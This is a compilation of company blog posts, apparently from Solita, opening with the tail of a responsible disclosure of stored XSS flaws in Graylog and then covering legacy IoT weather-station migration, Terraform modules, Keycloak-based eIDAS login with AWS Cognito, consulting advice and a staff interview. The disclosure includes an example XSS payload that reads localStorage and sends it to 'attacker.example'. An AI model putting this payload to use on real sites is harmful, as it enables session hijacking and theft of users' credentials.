23.04.2020 – A fix for the vulnerability was released in Grafana version 6.7.3

Graylog

Graylog is an open-source log management platform that is used by hundreds of companies including LinkedIn, Tieto, SAP, Lockheed Martin, and Solita. During one of our security assignments, we were able to find two stored XSS vulnerabilities.

During this assessment we had to dig deep into Graylog’s documentation to see what kinds of things were doable in the UI and how to properly make the magic happen. At one point we found out that it’s possible to generate links from the data Graylog receives, which is a classic way to gain XSS by injecting a payload such as ‘javascript:alert(1)’ into the ‘href’ attribute. This, however, requires the user to interact with the generated link by clicking it, but it still executes the JavaScript and does not make the effect of the execution any less dangerous.

Mika went through Graylog’s documentation and found a feature which allowed one to construct links from the data sources, but he couldn’t figure out right away how to generate the data needed to construct such a link. He told me about the link construction and shared his gut feeling that there would most likely be an XSS vector in there. After a brief moment of tinkering with the data creation, Mika decided to take a small coffee break, mostly because doughnuts were served. During this break I managed to find a way to generate the links correctly and trigger the vulnerability, thus finding a stored XSS in Graylog.



Graylog also supports content packs, and the UI provides a convenient way to install third-party content by importing a JSON file. The content pack developer can provide useful information in the JSON, such as the name, description, vendor, and URL, amongst other things. That last attribute served as a hint of what was coming: would there be a possibility to generate a link from that URL attribute?

Below you can see a snippet of the JSON that was crafted for testing the attack vector.


Once our malicious content pack was imported into the system, we got a beautiful (and not suspicious at all) link in the UI that executed our JavaScript payload once clicked.


As you can see from both of the screenshots, we were able to capture the user’s session information with our payloads, because it was stored in the browser’s LocalStorage. Storing sensitive information such as the user’s session in LocalStorage is not always such a great idea, as LocalStorage is meant to be readable by JavaScript. Session details in LocalStorage combined with an XSS vulnerability can lead to a nasty session hijacking situation.
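
To illustrate why this matters, here is a generic sketch of the idea (not the exact payload used in these assignments; the collector URL is made up): an injected script can simply read LocalStorage and ship it off to an attacker-controlled host.

<img src=x onerror="
  // Serialize whatever the application stored client-side, e.g. a session token
  var loot = JSON.stringify(localStorage);
  // Exfiltrate it by requesting an 'image' from an attacker-controlled server
  new Image().src = 'https://attacker.example/collect?d=' + encodeURIComponent(loot);
">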

Timeline

05.05.2020 – The vulnerabilities were found and reported to Graylog security team

07.05.2020 – The vendor confirmed that the vulnerabilities are being investigated

19.05.2020 – A follow-up query was sent to the vendor and they confirmed that fixes are being worked on

20.05.2020 – Fixes were released in Graylog versions 3.2.5 and 3.3.

 

References / Links

Read more about XSS:

https://owasp.org/www-community/attacks/xss/

https://portswigger.net/web-security/cross-site-scripting

 

AngularJS 1.6 sandbox removal:

http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html

 

Fixes / releases:

https://airflow.apache.org/docs/stable/changelog.html

https://community.grafana.com/t/release-notes-v6-7-x/27119

https://www.graylog.org/post/announcing-graylog-v3-3

 

Ye old timey IoT, what was it anyway and does it have an upgrade path?

What were the internet connected devices of old that collected data? Are they obsolete and need to be replaced completely or is there an upgrade path for integrating them into data warehouses in the cloud?

Previously on the internet

In the beginning the Universe was created.
This has made a lot of people very angry and been widely regarded as a bad move.

— Douglas Adams in his book “The restaurant at the end of the universe”

Then someone had another great idea to create computers, the Internet and the world wide web, and ever since then it’s been a constant stream of all kinds of multimedia content that one might enjoy as a kind of recompense for the previous blunders by the universe. (As these things usually go, some people have regarded these as bad moves as well.)

Measuring the world

Some, however, enjoy a completely different type of content. I am talking about data, of course. This need for understanding and measuring the world around us has been with us ever since the dawn of mankind, but the interconnected worldwide network combined with cheaper and better automation has accelerated our efforts massively.

Previously you had to trek to the ends of the earth, usually accompanied by great financial and bodily risk, to try and set up test equipment or to monitor it with your senses and write down the readings on a piece of paper. But then, suddenly, electronic sensors and other measurement apparatus could be combined with a computer to collect data on-site and warehouse it. (Of course, back then we called a warehouse of data a “database” or a “network drive” and had none of this new age poppycock terminology.)

Things were great; no need any longer to put your snowshoes on and risk being eaten by a vicious polar bear when you could just comfortably sit on your chair next to a desk with a brand new IBM PS/2 on it and check the measurements through this latest invention called the Mosaic web browser, or a VT100 terminal if your department was really old-school. (Oh, those were the days.)

These prototypes of IoT devices were very specialized pieces of hardware for very special use cases for scientists and other rather special types of folk, and no Internet-connected washing machines were in sight, yet. (Oh, in hindsight ignorance is bliss. Is it not?)

The rise of the acronym

First, they used Dual-Tone Multi-Frequency signalling, or DTMF. You put your phone next to the device, pushed a button on it and the thing would scream an ear-shattering series of audible pulses into your phone, which then relayed them to a computer somewhere. Later, if you were lucky, a repairman would come over and completely disregard the self-diagnostic report your washing machine had just sent over the telephone lines, and usually either fixed the damn thing or made the issue even worse while cursing computers all the way to hell. (Plumbers make bad IT support personnel and vice versa.)

From landlines to wireless

So because of this, and many other reasons, someone had a great idea to connect devices like these directly to your Internet connection and cut the middleman, your phone, out of the equation altogether. This made things simpler for everyone. (Except for the poor plumber, who still continued to disregard the self-diagnostic reports.) And everything was great for a while again until, one day, we woke up and there was a legion of decades-old washing machines, TVs, temperature sensors, cameras, refrigerators, ice boxes, video recorders, toothbrushes and a plethora of other “smart” devices connected to the Internet.

Internet Of Things, or IoT for short, describes these devices as a whole and the phenomenon, the age, that created them.

Suddenly it was no longer just a set of specialized hardware for special people that had connected smart devices collecting data. Now it was for everybody. (This has, yet again, been regarded as a bad move.) We have to look past the obvious security concerns that this rush of connecting every single (useless) thing to the Internet has created, but we can also see the benefit. The data flows, and data is the new oil, as the saying goes.

And there is a lot of data

The volume of data collected with all these IoT devices is staggering, and therefore simple daily old-timey FTP transfers of data to a central server are no longer a viable way of collecting it. We have come up with new protocols like REST, WebSockets, and MQTT to ingest real-time streams of new data points into our databases from all of these data-collecting devices.

Eventually, all backend systems were migrated or converted into data warehouses that were only accepting data with these new protocols and therefore were fundamentally incompatible with the old IoT devices.

What to do? Declare them all obsolete and replace them, or is there something that can be done to extend the lifespan of those devices and keep them useful?

The upgrade path, a personal journey

As an example of an upgrade path, I shall share a personal journey on which I embarked in the late 1990s. At this point in time, this is a macabre exercise in fighting against inevitable obsolescence, but I have devoted tears, sweat, and countless hours over the years to keep these systems alive, and today’s example is no different. The service in question runs on a minimal budget and with volunteer effort, so heavy doses of ingenuity are required.

Image: the Vaisala weather station at Hämeenlinna observatory, now connected via a Moxa serial server to remote logger software.

 

Even though Finland is located near or within the Arctic Circle, there are no polar bears around, except in a zoo. Setting up a Vaisala weather station is not something that will cause a furry meat grinder to release your soul from your mortal coil; no, it is actually quite safe. Due to a few circumstances and happy accidents, it is just what I ended up doing two decades ago when setting up a local weather station service in the city of Hämeenlinna. The antiquated 90’s web page design is one of those things I look forward to updating at some point, but today we are talking about what goes on in the background. We are talking about data collection.

The old, the garbage and the obsolete

Here we have the type of equipment that measures and logs data points about the weather conditions at a steady pace. The measurements are then read out by specialized software on a computer placed next to the station, since the communication is just plain old ASCII over a serial connection. The software is old. I mean really old. Actually, I am pretty sure that some of you reading this were not even born back in 1998:

Analysis of text strings inside of a binary
The image above shows an analysis of the program called YourVIEW.exe that is used to receive data from this antiquated weather station. It is programmed with LabVIEW version 3.243, which was released back in 1998. This software does not run properly on anything newer than Windows 2000.

This creates a few problematic dependencies; Problems that tend to get bigger with passing time.

The first issue is an obvious one: an old and unsupported version of the Windows operating system. No new security patches or drivers are available, which is a huge problem in any IT scenario, yet still a common one in any aging IoT solution.

The second problem: no new hardware is available. No operating system support means no new drivers, which means no new hardware if the old one breaks down. After spending a decade scavenging this and that piece of obsolete computer hardware, pulling together a somewhat functioning PC is quite a daunting task that keeps getting harder every year. People tend to just dispose of their old PCs when buying a new one. The half-life of old PC “obtanium” is really short.

The third challenge: one can’t get rid of Windows 2000 even if one wanted to, since the logging software does not run on anything newer than that; and yes, I even tried black magic, voodoo sacrifices and Wine under Linux, to no avail.

And finally, the data collection itself is a problem: how do you modernize something that uses its own data collection / logging software and integrate it with modern cloud services, when said software was conceived before modern cloud computing even existed?

Path step 1, an intermediate solution

As with any problem of a technical nature, investigating it yields several solutions, but most of them are infeasible for one reason or another. In my example case, I came up with a partial solution that I can later continue building on top of. At its core this is a cloud journey, a cloud migration, not much different from the ones I work on daily with our customers at Solita.

For the first problem, Windows updates, we really can’t do anything without updating the Windows operating system to a more recent and supported release, but unfortunately the data logging software won’t run on anything newer than Windows 2000; lift and shift it is, then. The solution is to virtualize the server and bolster the security around the vulnerable underbelly of the system with firewalls and other security tools. This has the added benefit of improving the service SLA by removing on-site server/workstation hardware failures and network and power outages from the equation. However, since the weather station communicates over a serial connection (RS232), we also need to somehow virtualize the added physical distance away. There are many solutions, but I chose a Moxa NPort 5110A serial server for this project. Combined with an Internet router capable of creating a secure IPSec tunnel between the cloud and the site, and by using Moxa’s Windows RealCOM drivers, one can securely map the on-site serial port to the remote Windows 2000 virtual server.

How about modernizing the data collection then? Luckily, YourVIEW writes the received data points into a CSV file, so it is possible to write a secondary logger in Python that collects those data points into a remote MySQL database as they become available.

Path step 2, next steps

What was before a vulnerable and obsolete pile of scavenged parts is still a pile of obsolete junk, but now it has a way forward. Many would have discarded this data collection platform as garbage and thrown it away, but with this example I hope to demonstrate that everything has a migration path, and that with proper lifecycle management your IoT infrastructure investment does not necessarily need to be only a three-year plan; you can expect returns for decades.

An effort on my part is ongoing to replace the YourVIEW software altogether with a homebrew logger that runs in a Docker container and publishes data over MQTT to Google Cloud Platform IoT Core. IoT Core together with Google Cloud Pub/Sub makes an unbeatable data ingestion framework. Data can be stored in, for example, Google Cloud SQL and/or exported to BigQuery for data warehousing, and finally visualized, for instance in Google Data Studio.

Even though I use the term “logger” here, the term “gateway” would be suitable as well. Old systems require interpretation and translation to be able to talk to modern cloud services. Either a commercial solution exists from the hardware vendor or, as in my case, you have to write one yourself.

Together we are stronger

I would like to think that my very specific example above is unique, but I am afraid it is not. In principle, all integration and cloud migration journeys have their own unique challenges.

Luckily, modern partners like Solita, with extensive expertise in cloud platforms such as Google Cloud Platform, Amazon Web Services and Microsoft Azure, as well as in software development, integration and data analytics, can help customers tackle these obstacles. Together we can modernize and integrate existing data collection infrastructures, for example on the web, in healthcare, in banking, on the factory floor, or in logistics. Throwing existing hardware or software into the trash and replacing them with new ones is time-consuming, expensive, and sometimes easier said than done. Therefore, carefully planning an upgrade path with a knowledgeable partner might be a better way forward.

Even when you are considering investing in a completely new data collection solution, integration is usually required at some stage of the implementation, and Solita, together with our extensive partner network, is here to help you.

Share your cloud infra with Terraform modules

The cloud comes with many advantages, and one really nice feature is infrastructure as code (IaC). IaC allows you to manage a data centre through definition files instead of physically configuring and setting up resources. A very popular tool for IaC is Terraform.

Terraform is a tool for IaC and it works with multiple clouds. Terraform configuration files are run from a developer’s machine or as part of CI/CD pipelines. Terraform allows you to create modules, reusable parts of the infrastructure. A module is a container for multiple resources that are used together. Even for a simple setup, modules are nice, as you do not need to repeat yourself, but they are especially handy with the more resource-heavy setups. For example, setting up even a somewhat simple AWS virtual private cloud (VPC) network can be resource-heavy and somewhat complex to do with IaC. As VPCs are typically set up in a similar fashion, generic Terraform modules can ease these deployments greatly.
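
As a minimal sketch, pulling in a generic VPC module from the Terraform Registry could look roughly like this. The terraform-aws-modules/vpc/aws module is a popular community module; the version constraint, CIDR ranges and availability zones below are placeholders you would adapt to your own environment:

module "vpc" {
  source  = "terraform-aws-modules/vpc/aws"
  version = "~> 2.0"                 # placeholder, pin to a real release

  name = "example-vpc"
  cidr = "10.0.0.0/16"

  azs             = ["eu-west-1a", "eu-west-1b"]
  private_subnets = ["10.0.1.0/24", "10.0.2.0/24"]
  public_subnets  = ["10.0.101.0/24", "10.0.102.0/24"]
}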

Share your work with your team and the world

A nice feature of Terraform modules is that you can share them fairly easily. When using modules, you can source them from multiple different locations, such as the local file system, version control repositories, GitHub, Bitbucket, AWS S3 or an HTTP URL. If, and when, you have your configuration files in version control, you can simply point your module’s source to that location, as sketched below. This makes sharing modules across teams handy.
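
Here are a few sketches of what the source argument can look like for different locations. The module names, the Git URL and the version constraints are purely illustrative:

# Module in the same repository, referenced by local path
module "network_local" {
  source = "./modules/network"
}

# Module in a shared Git repository, pinned to a tag
module "network_git" {
  source = "git::https://example.com/your-org/terraform-aws-network.git?ref=v1.0.0"
}

# Public module from the Terraform Registry (<namespace>/<name>/<provider>)
module "from_registry" {
  source  = "your-namespace/your-module/aws"
  version = "~> 1.0"
}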

Terraform also has the Terraform Registry, which is an index of publicly shared modules. Here you can share your modules with the rest of the world and really help out fellow developers. Going back to the VPC configuration, you can find really good Terraform modules to help you get started. Sharing your own code is easy, and Terraform has very good documentation about it [1]. All you need is a GitHub repository named according to Terraform’s conventions (terraform-<PROVIDER>-<NAME>), with a description, the standard module structure and a release tag. That’s all.

Of course, when sharing you should be careful not to share anything sensitive or environment-specific. Good Terraform Registry modules are typically very generic and self-contained. When sourcing directly from outside locations, it is good to keep in mind that at times they might not be available and your deployments might fail. To overcome this, taking snapshots of the modules you use might be a good idea.

Also, I find it a good practice to have a disable variable in the modules. This way the user of the module can choose whether to deploy the module at all by setting a single variable. It is good to take this kind of variable into account from the beginning, because in many cases it affects every resource in the module. I’ll explain this with the example below.

Send alarms to Teams channel – example

You start to build an application and early on want to have some monitoring in place. You identify the first key metric and start thinking about how to get notified about it. I run into this problem all the time. I’m not keen on emails, as those seem to get lost and require you to define who to send them to. On the other hand, I really like chats. Teams and Slack give you channels where you can collaborate on emerging issues, and it is easy to add people to the channels.

In AWS, I typically create CloudWatch alarms and route them to one SNS topic. By attaching a simple Lambda function to this SNS topic, one can forward the message to Teams, for example. In Teams, you control the message format with Teams cards. I created a simple card that has some information about the alarm and a link to the metric. I found myself doing this over and over again, so I decided to build a Terraform module for it.

Here is a simple image of the setup. The Terraform module sets up an SNS topic that in turn triggers a Lambda function. The Lambda function sends all the messages it receives to a Teams channel. The setup is really simple, but handy. All I need to do is route my CloudWatch alarms to the SNS topic set up by the module, and I get notifications in my Teams channel.

Simple image of the module and how it plugs into CloudWatch events and Teams

The module only requires you to provide the Teams channel webhook URL where the messages are sent. When you create CloudWatch alarms, you just need to send them to the SNS topic that the module creates. The SNS topic ARN is available as a module output.

You can now find the Terraform module in the Terraform Registry under the name “alarm-chat-notification”, or by following the link in the footer [2]. A usage sketch follows below. I hope it helps you get going with alarms.
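
As a rough usage sketch: the input and output names below (webhook_url, sns_topic_arn) are illustrative rather than the module’s exact interface, so check the registry page for the real ones, and the version constraint and webhook URL are placeholders. The wiring looks roughly like this:

module "alarm_notifications" {
  source  = "aloukiala/alarm-chat-notification/aws"
  version = "~> 1.0"                  # placeholder version constraint

  # Illustrative input name: the Teams incoming webhook URL
  webhook_url = var.teams_webhook_url
}

# Route a CloudWatch alarm to the SNS topic the module creates
resource "aws_cloudwatch_metric_alarm" "high_cpu" {
  alarm_name          = "high-cpu"
  namespace           = "AWS/EC2"
  metric_name         = "CPUUtilization"
  statistic           = "Average"
  period              = 300
  evaluation_periods  = 1
  threshold           = 80
  comparison_operator = "GreaterThanThreshold"

  # Illustrative output name for the topic ARN
  alarm_actions = [module.alarm_notifications.sns_topic_arn]
}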

Disable variable

As I mentioned before, it is good practice to have a disable variable in a module. Doing this in Terraform is a bit tricky. First, create a variable to control it; in my repo it is called “create” and it is a boolean that defaults to true. Now every resource in my module has to have the following line:

count = var.create ? 1 : 0

In Terraform this simply means that if the variable is false, the count is 0 and the resource will not be created. Not the most intuitive, but it makes sense. It also means that every resource becomes a list. Therefore, if you refer to another resource, you have to do it with a list operation, even when you know there is only one instance. For example, when my Lambda function refers to its role, it does so by referring to the first element in the list as follows:

aws_iam_role.iam_for_lambda[0].arn

Again this makes sense and it is good to keep in mind.
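
Putting the pieces together, a minimal sketch of the pattern might look like the following. The resource names and details here are illustrative, not the module’s actual code:

variable "create" {
  description = "Set to false to disable all resources in this module"
  type        = bool
  default     = true
}

resource "aws_iam_role" "iam_for_lambda" {
  count = var.create ? 1 : 0     # creates either one role or none

  name = "alarm-notification-lambda"
  assume_role_policy = jsonencode({
    Version = "2012-10-17"
    Statement = [{
      Action    = "sts:AssumeRole"
      Effect    = "Allow"
      Principal = { Service = "lambda.amazonaws.com" }
    }]
  })
}

resource "aws_lambda_function" "notifier" {
  count = var.create ? 1 : 0

  function_name = "alarm-to-teams"
  runtime       = "python3.8"
  handler       = "handler.lambda_handler"
  filename      = "lambda.zip"                       # packaged function code
  role          = aws_iam_role.iam_for_lambda[0].arn # list index due to count
}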

I hope this blog inspires you to create reusable Terraform modules for the world to use. And please, feel free to source the alarm module.

[1] https://www.terraform.io/docs/registry/modules/publish.html
[2] https://registry.terraform.io/modules/aloukiala/alarm-chat-notification/aws/

The author of this blog post is a data engineer who has built many cloud-based data platforms for some of the largest Nordic companies.

How to win friends and influence people by consulting?

By definition, consulting is easy: just advise people on how to do things in a wiser manner. But how to keep yourself motivated and your skills up to date in this fast-paced world is a totally different matter!

I have done consulting over the years in several different companies and have developed a routine that helps achieve the things described in the opening paragraph. Not everyone is cut out for consulting; it requires a special type of person to succeed in it. I am not saying you need to be especially good at particular topics to be able to share your knowledge with your customers.

The first rule of thumb is that you never, never let your skills get old. It does not matter how busy you are. Always, and I mean always, make some time to study and test new things. If you don’t, you will soon be obsolete.

The second rule of consulting 101 is that you need to keep yourself motivated. Once work becomes a chore, you lose your “sparkle” and customers can sense it. If you want to be on top of your game, you need to have that thing that keeps customers coming back to you.

The third rule is that you need to keep your customers happy. Always remember who pays your salary. This should be pretty obvious, though.

The fourth and most important rule is “manage yourself”. This is extremely important in this line of work. It is easy to work too much, sleep too little and eventually burn out. Managing yourself takes practice, but it is absolutely necessary in the long run. To avoid working too much, you need to know yourself and recognize the symptoms that signal you are not doing well. I need to sleep, eat and exercise to stay out of that situation. Just saying “work less” is not always possible, so good physical and mental health is essential.

The consulting business can be a cutthroat line of work where only the strongest survive; some describe it as a meritocracy. At Solita it is not so black and white, and we have balanced the game quite well.
Of course we need to work and do those billable hours, but we have a bit more legroom, and we aim to be the top house in the Nordics, leaving the leftovers for the B-players to collect.

If you still think you might be cut out for consulting work, give me a call, send a WhatsApp message or contact me by some other means:

Twitter @ToniKuokkanen
IRCnet tuwww
+358 401897586
toni.kuokkanen@solita.fi
https://www.linkedin.com/in/tonikuokkanen/

https://en.wikipedia.org/wiki/How_to_Win_Friends_and_Influence_People 

Integrating AWS Cognito with Suomi.fi and other eIDAS services via a SAML interface

AWS Cognito and Azure AD both support SAML SSO integration, but neither supports encrypting and signing SAML messages. Here is a solution to a problem that many European public sector organizations are facing.

At the end of 2018, the Ministry of Finance of Finland issued guidelines on how Finnish public sector organizations should treat public cloud environments. To summarize: a “cloud first” strategy. Everybody should use the public cloud, and if they don’t, there must be a clear reason why not. The most typical reason is, of course, classified data. The strategy is a big and clear signal of change in how organizations should treat the public cloud nowadays.

To move forward fast, most applications require an authentication solution. In one of my customer projects I was asked to design the AWS cloud architecture for a new solution with a requirement for strong authentication of citizens and public entities. In Finland, public sector organizations can use an authentication service called Suomi.fi (Suomi means Finland) to obtain a trusted identity; it integrates banks and other identity providers into a common platform. The service strictly follows the Electronic Identification, Authentication and Trust Services (eIDAS) standard. Currently, and at least in the short term, Suomi.fi supports only SAML integration.

eIDAS SAML with AWS Cognito – Not a piece of cake

Okay, that’s fine. The plan was to use AWS Cognito as a strong security boundary for the applications, and it supports “the old” SAML integration. But a few hours later I started to say no, why and what. The eIDAS standard requires encrypted and signed SAML messaging. Sounds reasonable. However, I soon found out that AWS Cognito (or, for example, Azure AD) does not support it. My world collapsed for a moment. This was not going to be as easy as I thought.

After contacting AWS partner services and the Suomi.fi service organization, it was clear that I needed to get my hands dirty and build something myself. At Solita we are used to open discussions and sharing information between projects, so I already knew there were at least a couple of other projects facing the same problem: they also use AWS Cognito and also need to integrate with the eIDAS authentication service. This made my journey more fascinating, because I could solve a problem for multiple teams.

Solution architecture

Red Hat JBoss Keycloak is the star of the day

Again, thanks to open discussion, my dear colleague Ari from Solita Health (see how he is doing during this remote work period) pointed out that I should look into a product called Keycloak. After I found out that it is backed by Red Hat JBoss, I knew it has a strong background. Keycloak is a single sign-on solution which supports, for example, SAML integration towards the eIDAS service and OpenID Connect towards AWS Cognito.

Here is a simple reference architecture of the solution account setup:

The solution is built with DevOps practices. There is one Git repository for the Keycloak Docker image and one for the AWS CDK project. The AWS CDK project provisions the components inside the dashed-line area to the AWS account (plus, for example, the CI/CD pipelines not shown in the picture). The rest is done by each project’s own IaC repository, because it varies too much between projects.

We run Keycloak as a container in an AWS Fargate service that always has at least two instances running, in two availability zones in the region. The Fargate service integrates nicely with an AWS Application Load Balancer (ALB): for example, if one container is not able to answer a health check request, it stops receiving traffic and is soon replaced by another container automatically.

Multiple Keycloak instances form a cluster, and they need to share data with each other over TCP connections. Keycloak uses JGroups to form the cluster. In this solution, the Fargate service automatically registers (and deregisters) each container in the AWS Cloud Map service, which provides a DNS interface for finding out which instances are up and healthy. Keycloak then uses the JGroups “DNS_PING” discovery method to find the other instances via the Cloud Map DNS records.
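
The project itself was provisioned with AWS CDK, but to make the discovery setup concrete, here is a rough Terraform-style sketch of the Cloud Map pieces. The namespace, names and TTL are placeholders, and the JGROUPS_* environment variable names in the comment follow the conventions of the jboss/keycloak container image, so verify them against the image documentation you actually use:

variable "vpc_id" {
  type = string
}

# Private DNS namespace that Cloud Map manages for service discovery
resource "aws_service_discovery_private_dns_namespace" "keycloak" {
  name = "keycloak.internal"
  vpc  = var.vpc_id
}

# Each healthy Fargate task gets registered here as an A record
resource "aws_service_discovery_service" "keycloak" {
  name = "keycloak"

  dns_config {
    namespace_id = aws_service_discovery_private_dns_namespace.keycloak.id

    dns_records {
      ttl  = 10
      type = "A"
    }
  }
}

# The ECS service attaches its tasks to the Cloud Map service with a
# service_registries block, and the Keycloak container is pointed at the
# records with environment variables along these lines:
#   JGROUPS_DISCOVERY_PROTOCOL   = "dns.DNS_PING"
#   JGROUPS_DISCOVERY_PROPERTIES = "dns_query=keycloak.keycloak.internal"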

The other thing a Keycloak cluster needs is a database. In this solution we used the AWS Aurora PostgreSQL managed database service.

The login flow

The browser is the key integrating element, because it is redirected multiple times, carrying payloads from one service to another. If you don’t have previous knowledge of how SAML works, check out Basics of SAML Auth by Christine Rohacz.

The (simplified) initial login flow is described below. Yep, even though it is hugely simplified, it still has quite a few steps.

  1. The user accesses the URL of the application. The application is protected by an AWS Application Load Balancer, and its listener rule requires the user to have a valid AWS Cognito session. Because the session is missing, the user is redirected to the AWS Cognito domain.
  2. AWS Cognito receives the request and, because no session is found and an identity provider is defined, it forwards the user on to the Keycloak URL.
  3. Keycloak receives the request and, because no session is found and a SAML identity provider is defined, it forwards the user on to the Suomi.fi authentication service with a signed and encrypted SAML AuthnRequest.
  4. After the user has proven his or her identity at the Suomi.fi service, Suomi.fi redirects the user back to the Keycloak service.
  5. Keycloak verifies the SAML message, extracts its attributes, and forwards the user back to the AWS Cognito service.
  6. AWS Cognito verifies the OpenID message, requests more user information from Keycloak using the client secret, and finally redirects the user back to the application’s ALB.
  7. The application’s ALB receives the identity and finally redirects the user back to the original path of the application.

Now the user has a session with the application ALB (not with the Keycloak ALB) for several hours.

The application internally receives a few extra headers

The application ALB adds two JWT tokens, via the x-amzn-oidc-accesstoken and x-amzn-oidc-data headers, to each request it sends to the backend. From those headers, the application can easily access information about who is logged in and other details of the user profile in AWS Cognito. The headers are only passed between the ALB and the application.

Here is an example of the decoded contents of those headers:

Notice: the data is imaginary, from Suomi.fi test users.

x-amzn-oidc-accesstoken: {
    "sub": "765371aa-a8e8-4405-xxxxx-xxxxxxxx",
    "cognito:groups": [
        "eu-west-1_xxxxxx"
    ],
    "token_use": "access",
    "scope": "openid",
    "auth_time": 1591106167,
    "iss": "https://cognito-idp.eu-west-1.amazonaws.com/eu-west-1_xxxxxx",
    "exp": 1591109767,
    "iat": 1591106167,
    "version": 2,
    "jti": "xxxxx-220c-4a70-85b9-xxxxxx",
    "client_id": "xxxxxxx",
    "username": "xxxxxxxxx"
}

x-amzn-oidc-data: {
    "custom:FI_VKPostitoimip": "TURKU",
    "sub": "765371aa-a8e8-4405-xxxxx-xxxxxxxx",
    "custom:FI_VKLahiosoite": "Mansikkatie 11",
    "custom:FI_firstName": "Nordea",
    "custom:FI_vtjVerified": "true",
    "custom:FI_KotikuntaKuntanro": "853",
    "custom:FI_displayName": "Nordea Demo",
    "identities": "[{\"userId\":\"72dae55e-59d8-41cd-a413-xxxxxx\",\"providerName\":\"Suomi.fi-kirjautuminen\",\"providerType\":\"OIDC\",\"issuer\":null,\"primary\":true,\"dateCreated\":1587460107769}]",
    "custom:FI_lastname": "Demo",
    "custom:FI_KotikuntaKuntaS": "Turku",
    "custom:FI_commonName": "Demo Nordea",
    "custom:FI_VKPostinumero": "20006",
    "custom:FI_nationalIN": "210281-9988",
    "username": "Suomi.fi-kirjautuminen_72dae55e-59d8-41cd-a413-xxxxxx",
    "exp": 1591106287,
    "iss": "https://cognito-idp.eu-west-1.amazonaws.com/eu-west-1_xxxxxx"
}

Security

Multiple security elements and best practices are in use in this solution as well. For example, each environment of each system has its own AWS account as the first security boundary, so there is a separate Keycloak installation for each environment.

A few secret strings are generated into AWS Secrets Manager and used by the Keycloak service via secret injection at runtime through the Fargate task definition. For example, the OpenID client secret is generated and shared via AWS Secrets Manager, and it is never published to a code repository. A rough sketch of the mechanism follows below.
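
Again, the actual setup was done with AWS CDK, but a Terraform-style sketch of the same idea, injecting a Secrets Manager value into the container at runtime, could look roughly like this. The names, sizes and image are placeholders, and the task additionally needs an execution role that is allowed to read the secret:

resource "aws_secretsmanager_secret" "oidc_client_secret" {
  name = "keycloak/oidc-client-secret"
}

resource "aws_ecs_task_definition" "keycloak" {
  family                   = "keycloak"
  requires_compatibilities = ["FARGATE"]
  network_mode             = "awsvpc"
  cpu                      = "1024"
  memory                   = "2048"

  container_definitions = jsonencode([
    {
      name      = "keycloak"
      image     = "example/keycloak:latest"   # placeholder image
      essential = true

      # The value is fetched from Secrets Manager when the task starts,
      # so it never appears in the repository or in plain text in the
      # task definition.
      secrets = [
        {
          name      = "OIDC_CLIENT_SECRET"
          valueFrom = aws_secretsmanager_secret.oidc_client_secret.arn
        }
      ]
    }
  ])
}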

The Keycloak service is published only through the Suomi.fi realm; for example, the admin panel of the default realm is not published to the internet. A realm is a Keycloak concept for hosting multiple solutions inside a single Keycloak installation with boundaries between them.

Keycloak stores user profiles, but they can be automatically cleaned up if the project requires it.

About me

I’m a cloud architect/consultant for public sector customers in Finland at Solita. I have a long history with AWS. I found a newsletter from September 2008 announcing the EBS service; my brother and I were excited and commented “finally, persistent storage for EC2”. EC2 was extended to Europe a month later. So I know for sure that I have used AWS services at least since 2008. Of course, not every year has been the same, but it is nice to have some memories with you.

What have you always wanted to know about the life of Solita’s Cloud expert?

What’s it like to work at Solita and in the Cloud team? During recruitment meetings and discussions, candidates bring up a range of questions and preconceptions about life at Solita. I asked Helinä Nuutinen from our Cloud Services team in Helsinki to answer some of the most common ones. She might be a familiar face to those who’ve had a technical interview with us.

 

Helinä, could you tell us a little bit about yourself?

I’ve been with Solita for a year as a Cloud Service Specialist in the Cloud Services team. Before that, I worked with more traditional data centre and network services. I was particularly interested in AWS and DevOps, but the emphasis of my previous role was a little different. I participated in Solita’s AWS training, and before I knew it, I started working here.

Currently, I’m part of the operations team of our media-industry customer. Due to coronavirus, we’re working from home, getting used to the new everyday life. I have five smart and friendly team mates, with whom I would normally sit at the customer site from Monday through Thursday. The purpose of our team is to develop and provide tools and operational support services for development teams. We develop and maintain shared operational components such as code-based infrastructure with Terraform and Ansible, manage logs with Elasticsearch Stack as well as DevOps tools and monitoring.

I typically spend my free time outdoors in Western Helsinki, take care of my window sill garden, and work on various crafting and coding projects. Admittedly, lately I haven’t had much energy to sit at the computer after work.

Let’s go through the questions. Are the following statements true or false?

#1 Solita’s Cloud team only works on cloud services, and you won’t succeed if you don’t know AWS, for example.

Practically false. Solita will implement new projects in the public cloud (AWS, Azure, GCP) if there are no regulatory maintenance requirements. We produce regulated environments in the private cloud together with a partner.

To succeed at Solita, you don’t have to be an in-depth expert on AWS environments – interest and background in similar tasks in more traditional IT environments is a great start. If you’re interested in a specific cloud platform, we offer learning paths, smaller projects, or individual tasks.

Many of our co-workers have learned the ins and outs of the public cloud and completed certifications while working at Solita. We are indeed learning at work.

#2 At Solita, you’ll be working at customer sites a lot.

Both true and false. In the Cloud team, it’s rare to sit at the customer site full time. We’re mindful of everyone’s personal preferences. I personally like working on site. Fridays are so-called office days when you have a great reason to visit the Solita office and hang out with colleagues and people you don’t normally meet.

In consulting-focused roles, you’ll naturally spend more time at the customer site, supporting sales as well.

(Ed. Note: Our customers’ wishes regarding time spent on site vary. In certain projects, it’s been on the rise lately. However, we will always discuss this during recruitment so that we’re clear on the candidate’s preferences before they join us.)

#3 Solita doesn’t do product development.

Practically false – we do product development, too. Our portfolio includes at least ADE (Agile Data Engine) and WhiteHat. Our Cloud Services team is developing our own monitoring stack, so we also do “internal development”.

(Ed. Note: The majority of Solita’s sales comes from consulting and customer projects, but we also do in-house product development. In addition to WhiteHat and Agile Data Engine, we develop Oravizio, for example. Together, these amount to about 2 MEUR. Solita’s net sales in 2019 was approximately 108 MEUR.)

#4 If you’re in the Cloud team, you need to know how to code.

Sort of. You don’t have to be a super coder. It also depends on what kind of projects you have in the pipeline. However, in the Cloud Services team, we build all infrastructure as code, do a lot of development work around our monitoring services, and write useful tools. We’re heavy users of Ansible, Python, Terraform and CloudFormation, among others, so scripting or coding skills are definitely an advantage.

#5 The team is scattered in different locations and works remotely a lot.

Sort of true. We have several Cloud team members in Helsinki, Tampere and Turku, and I would argue that you’ll always find a team mate in the office. You can, of course, work remotely as much as your projects allow. Personally, I like to visit the office once a week to meet other Solitans.

To bridge the distance, we go through team news and discuss common issues in bi-weekly meetings. In informal location-specific discussions, we share and listen to each other’s feedback.

#6 I have a lengthy background in the data centre world, but I’m interested in the public cloud. Solita apparently trains people in this area?

